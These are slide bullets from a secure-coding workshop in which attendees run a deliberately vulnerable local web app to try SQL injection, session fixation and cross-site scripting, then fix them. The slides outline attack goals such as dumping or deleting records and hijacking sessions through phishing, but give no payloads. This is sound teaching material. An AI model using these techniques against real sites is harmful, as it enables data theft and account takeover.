2. Introduction
• Andi R Djunaedi
• Software Engineer at blibli.com since March 2014
• https://www.linkedin.com/in/andird
• https://github.com/andirdju
• https://github.com/bliblidotcom
3. Overview – understand the problem
• Theory
• Code
• Web application -> we’ll talk about this
• Operating System
• Network
• Other?
• Importance
• Practice, get your laptop, pc or whatever
• How it works
4. Theory - Code
• Web Applications
• OWASP Top 10 List - new list every 3 years
• https://www.owasp.org/index.php/Top_10_2013-Top_10
• https://www.owasp.org/index.php/Top_10_2010-Main
• Top 3 - Samples
• SQL Injection
• Arbitrary SQL query execution
• Session Fixation
• Assume other’s Identity
• Cross Site Scripting
• Arbitrary client code (javascript, html) execution
5. Importance – Non Security
• Performance
• poor user experience
• redesign, refactor, make it faster
• Code coverage
• buggy, spent more time on fixing bug
• stop the leak
• When
• next iteration
6. Importance – Security
• How to fix security incidents ???
• Personal/Financial data stolen
• Data deleted
• When
• NOW !!!
7. Practice – Understand the problem
• Run bad web app
• OWASP Top 3 Sample
• SQL Injection
• Session Fixation
• Cross Site Scripting
• Exercise
8. Run – web app
• Git, Jdk 8, Maven
• https://github.com/bliblidotcom/sample-basic-secure-coding
• In memory H2 database
• Embedded server
• mvn spring-boot:run
• http://localhost:8080
9. Get your laptop – SQL Injection
• Demo – Valid use case is only find one record by id
• Read all records
• Insert new records
• Delete all records
10. Get your laptop – Session Fixation
• Demo - session info only known to the user
• Bad person(A) create new session
• Persuade unsuspecting person(B) via phishing
• Bad person(A) get session information of other person(B)
11. Get your laptop – Cross Site Scripting
• Demo – valid use case only displays list of data
• Can be done via the same SQL injection
• Html
• Add html form
• Javascript
• Add pop up
• Add redirect
12. What’s Next
• Crack the other API
• it have similar problems
• Fix the exploit
• Don’t repeat yourself by creating custom solutions
• SQL named parameter
• Regenerate session id
• Content escaping